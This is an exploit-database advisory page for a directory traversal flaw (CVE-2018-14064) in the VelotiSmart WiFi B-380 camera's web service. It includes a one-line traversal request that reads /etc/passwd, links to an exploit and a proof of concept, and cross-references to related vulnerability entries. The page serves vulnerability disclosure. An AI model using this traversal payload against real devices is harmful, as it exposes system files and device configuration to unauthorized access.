Lucene search
Miguel Mendez Z1337DAY-ID-30723HistoryJul 16, 2018 - 12:00 a.m.
VelotiSmart WiFi B-380 Camera - Directory Traversal Vulnerability
2018-07-1600:00:00
Miguel Mendez Z
0day.today
32
0.157 Low
EPSS
Percentile
96.0%
Exploit for hardware platform in category web applications
Title: Vulnerability in VelotiSmart Wifi - Directory Traversal
Date: 12-07-2018
Scope: Directory Traversal
Platforms: Unix
Author: Miguel Mendez Z
Vendor: VelotiSmart
Version: B380
CVE: CVE-2018–14064
Vulnerability description
-------------------------
- The vulnerability that affects the device is LFI type in the uc-http service 1.0.0. What allows to obtain information of configurations, wireless scanned networks, sensitive directories, etc. Of the device.
Vulnerable variable:
http://domain:80/../../etc/passwd
Exploit link:
https://github.com/s1kr10s/ExploitVelotiSmart
Poc:
https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
# 0day.today [2018-07-16] #Related
prion
prion
Directory traversal
2018-07-15 15:29:00
cve
cve
CVE-2018-14064
2018-07-15 15:29:00
nuclei
nuclei
VelotiSmart Wifi - Directory Traversal
2021-09-07 12:44:38
cvelist
cvelist
CVE-2018-14064
2018-07-15 15:00:00
packetstorm
packetstorm
VelotiSmart WiFi B-380 Camera Directory Traversal
2018-07-16 00:00:00
nvd
nvd
CVE-2018-14064
2018-07-15 15:29:00
openvas
openvas
Generic HTTP Directory Traversal (Web Root) - Active Check
2017-04-18 00:00:00